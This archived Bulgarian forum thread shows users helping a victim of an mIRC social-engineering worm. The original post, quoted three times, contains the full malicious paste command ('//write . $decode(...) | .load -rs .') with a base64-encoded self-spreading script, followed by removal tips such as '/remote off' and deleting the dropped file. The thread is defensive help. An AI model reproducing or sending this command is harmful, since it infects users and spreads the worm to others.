bg_korn2005 Posted August 13, 2005 Share Posted August 13, 2005 Pyrvo iskam da kaja che ako tazi tema e ima nqkyde se izvinqvam specialno na adminite i moderatorite za tova A vyprosa mi e sledniqt Dokato chatih v Mirc mi doide edno takova saobshtenie: Ako iskash da stanesh operator v Plovdiv copy/paste tova //write . $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljayB8IC50aW1lcqAgMCAxMjAgLmpv aW4gI0JveXMmR2lybHMgfCAubXNnICRuaWNrIElza2FzaCBsaSBkYSBieWRlc2ggT3BlcmF0b3IgdiAk Y 2hhbiA/IGNvcHkvcGFzdGUgVG93YS0+AzcgLy93cml0ZSCgLqAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJl YWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAuoCAkY2hyKDEyNCkg L y9tb2RlICQgJCsgbWUgK1IgfQ==,m) | .load -rs . | i az nali sym si shmatka vzeh che opitah sega sa mi bannali neshto i imam nqkyv virus molq nqkoi ako moje da mi kaje kak da gi mahna tiq chudesii za da moga da chatq otnovo Link to comment Share on other sites More sharing options...
fon_tomov Posted August 13, 2005 Share Posted August 13, 2005 Pyrvo iskam da kaja che ako tazi tema e ima nqkyde se izvinqvam specialno na adminite i moderatorite za tova A vyprosa mi e sledniqt Dokato chatih v Mirc mi doide edno takova saobshtenie: Ako iskash da stanesh operator v Plovdiv copy/paste tova //write . $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljayB8IC50aW1lcqAgMCAxMjAgLmpv aW4gI0JveXMmR2lybHMgfCAubXNnICRuaWNrIElza2FzaCBsaSBkYSBieWRlc2ggT3BlcmF0b3IgdiAk Y 2hhbiA/IGNvcHkvcGFzdGUgVG93YS0+AzcgLy93cml0ZSCgLqAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJl YWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAuoCAkY2hyKDEyNCkg L y9tb2RlICQgJCsgbWUgK1IgfQ==,m) | .load -rs . | i az nali sym si shmatka vzeh che opitah sega sa mi bannali neshto i imam nqkyv virus molq nqkoi ako moje da mi kaje kak da gi mahna tiq chudesii za da moga da chatq otnovo <{POST_SNAPBACK}> 1.Какав е вирус-а? 2.Бан-а ако е пернаментен няма махане 3.Използвай "Search" Link to comment Share on other sites More sharing options...
Botev1912 Posted August 13, 2005 Share Posted August 13, 2005 Тва е най-голямата простотия да отваряш сайтовете и нещата, които се пращат като реклами. Всичко до 1 е вирус Link to comment Share on other sites More sharing options...
fon_tomov Posted August 13, 2005 Share Posted August 13, 2005 Тва е най-голямата простотия да отваряш сайтовете и нещата, които се пращат като реклами. Всичко до 1 е вирус <{POST_SNAPBACK}> Особено когато непознат ти каже че ще те направи оперетор на канал Link to comment Share on other sites More sharing options...
VeSo Posted August 13, 2005 Share Posted August 13, 2005 Преинсталираш скрипта и си готов Link to comment Share on other sites More sharing options...
bg_korn2005 Posted August 13, 2005 Author Share Posted August 13, 2005 a tova govori li vi neshto Baned: Imate VIRUS! Iskali ste da stanete operator v nyakoj kanal. Prochetete instrukcii kak da si mahnete virusa na tozi adres (2005/08/13 17.59) znachi po nqkakvyv nachin tova chudo ima mahane kajete mi kak tochno da go mahna shtoto nerazbiram Link to comment Share on other sites More sharing options...
fon_tomov Posted August 13, 2005 Share Posted August 13, 2005 a tova govori li vi neshto Baned: Imate VIRUS! Iskali ste da stanete operator v nyakoj kanal. Prochetete instrukcii kak da si mahnete virusa na tozi adres (2005/08/13 17.59) znachi po nqkakvyv nachin tova chudo ima mahane kajete mi kak tochno da go mahna shtoto nerazbiram <{POST_SNAPBACK}> Най-вероятно това е базик .Сканирай с Нортан или нещо подобно Link to comment Share on other sites More sharing options...
VeSo Posted August 13, 2005 Share Posted August 13, 2005 Не е базик щом си пейстнал тва за да станеш оператор, си се заразил с вирус Разрешение: Преинсталираш си скрипта(мирката) Link to comment Share on other sites More sharing options...
fon_tomov Posted August 13, 2005 Share Posted August 13, 2005 Не е базик щом си пейстнал тва за да станеш оператор, си се заразил с вирусРазрешение: Преинсталираш си скрипта(мирката) <{POST_SNAPBACK}> Нямаш си идея за какво говориш...Ако има вирус няма да е зле да сканира с анти-виросна програма за да види колко и кой файлове са заразени...В интернет е пално с такива тъпни и аз си мисля че няма да има вируси ...Ако вируса(ако има такав)е заразил не само мирка-та няма да се оправи само с реинстал на скрипта Link to comment Share on other sites More sharing options...
po_taka Posted August 13, 2005 Share Posted August 13, 2005 zna4i tova koeto si kopnal e kodiran nqkakyv kod. V mirc v Status prozireca napi6i "/remote off" bez kavi4kite. Probvai da se conectne6 i kaji dali o6te ima6 tozi problem. Link to comment Share on other sites More sharing options...
VeSo Posted August 13, 2005 Share Posted August 13, 2005 Нямаш си идея за какво говориш...Ако има вирус няма да е зле да сканира с анти-виросна програма за да види колко и кой файлове са заразени...В интернет е пално с такива тъпни и аз си мисля че няма да има вируси ...Ако вируса(ако има такав)е заразил не само мирка-та няма да се оправи само с реинстал на скрипта <{POST_SNAPBACK}> Имал съм същия проблем, когато пейстнеш това за оператора се заразяваш и ти слагат G-line, оправя се с преинсталиране на скрипта, може и с /remote off да са оправи, ама не винаги става Link to comment Share on other sites More sharing options...
bg_korn2005 Posted August 14, 2005 Author Share Posted August 14, 2005 Ei hora rabotata stana kakto mi kazahte izkluchitelno sym vi blagodaren Link to comment Share on other sites More sharing options...
stoian88 Posted December 13, 2005 Share Posted December 13, 2005 Аз имам проблем в ИРЦ. Когато влезна в някакъв канал и топика е на БГ не ми го дава а го дава с някви йепоглифи. Link to comment Share on other sites More sharing options...
VeSo Posted December 13, 2005 Share Posted December 13, 2005 Горе от менюто даваш на фонтс и от там даваш кирилица Link to comment Share on other sites More sharing options...
FuRyFoX Posted December 13, 2005 Share Posted December 13, 2005 Pyrvo iskam da kaja che ako tazi tema e ima nqkyde se izvinqvam specialno na adminite i moderatorite za tova A vyprosa mi e sledniqt Dokato chatih v Mirc mi doide edno takova saobshtenie: Ako iskash da stanesh operator v Plovdiv copy/paste tova //write . $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljayB8IC50aW1lcqAgMCAxMjAgLmpv aW4gI0JveXMmR2lybHMgfCAubXNnICRuaWNrIElza2FzaCBsaSBkYSBieWRlc2ggT3BlcmF0b3IgdiAk Y 2hhbiA/IGNvcHkvcGFzdGUgVG93YS0+AzcgLy93cml0ZSCgLqAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJl YWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAuoCAkY2hyKDEyNCkg L y9tb2RlICQgJCsgbWUgK1IgfQ==,m) | .load -rs . | i az nali sym si shmatka vzeh che opitah sega sa mi bannali neshto i imam nqkyv virus molq nqkoi ako moje da mi kaje kak da gi mahna tiq chudesii za da moga da chatq otnovo Значи пробвай по следния начин ! 1. ънинстал мИРЦ 2. сканирай с антивира 3. инстал ново копие на мИРЦ едит: Опс май нмаше нужда от тоя пост . сОрИ Link to comment Share on other sites More sharing options...
VeSo Posted December 13, 2005 Share Posted December 13, 2005 Значи пробвай по следния начин ! 1. ънинстал мИРЦ 2. сканирай с антивира 3. инстал ново копие на мИРЦ едит: Опс май нмаше нужда от тоя пост . сОрИ хаха и аз така са заблудих, добре че видях , че съм писал и първо много се учудих Link to comment Share on other sites More sharing options...
stoian88 Posted December 13, 2005 Share Posted December 13, 2005 Горе от менюто даваш на фонтс и от там даваш кирилица Ми на тоя шпифт дет е подразбиране нестава нещо. Или ако стане ми променя шрифта. А аз не искам да го сменя. Link to comment Share on other sites More sharing options...
VeSo Posted December 13, 2005 Share Posted December 13, 2005 Ето как ми е мойто и сичко си е нормално Link to comment Share on other sites More sharing options...
dX Posted December 14, 2005 Share Posted December 14, 2005 Всичко изписано по темата е бълвоч и половина Въпросният "вирус" се съдържа в един файл в директорията на мирката.. файла се казва .&, спри мирката, изтрии файла, и си пускай пак мирката.. това е А това за йероглифите.. елементарно, скъпи ми Уорсън Отиваш на View - Font, и там 'дето пише Script избираш Cyrilic.. И слагаш отметката долу на която пише "set as default.." Това го правиш в някой канал. После във всеки следващ канал като влезеш всичко ще ти е 6. Ако нямаш Script Cyrilic, тогава избери друг шрифт.. или просто инсталирай Windows-ските шрифтове с кирилицата Link to comment Share on other sites More sharing options...
Mast3rX Posted April 2, 2006 Share Posted April 2, 2006 Влизаш в мирк и пишеш : /remote off ,и за напред ,не се хващай на тия шитз. Link to comment Share on other sites More sharing options...
lil_stenly Posted April 3, 2006 Share Posted April 3, 2006 погледни ТУК (UNIBG). изтрий си скрипта и след това си направи mrc фаел с командата кудето е пише в линк-а ! тази команда както ще прочетете там забранява да въвеждате кодове които започват с /write Link to comment Share on other sites More sharing options...
VeSo Posted April 3, 2006 Share Posted April 3, 2006 Абе гледайте малко откога е темата Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.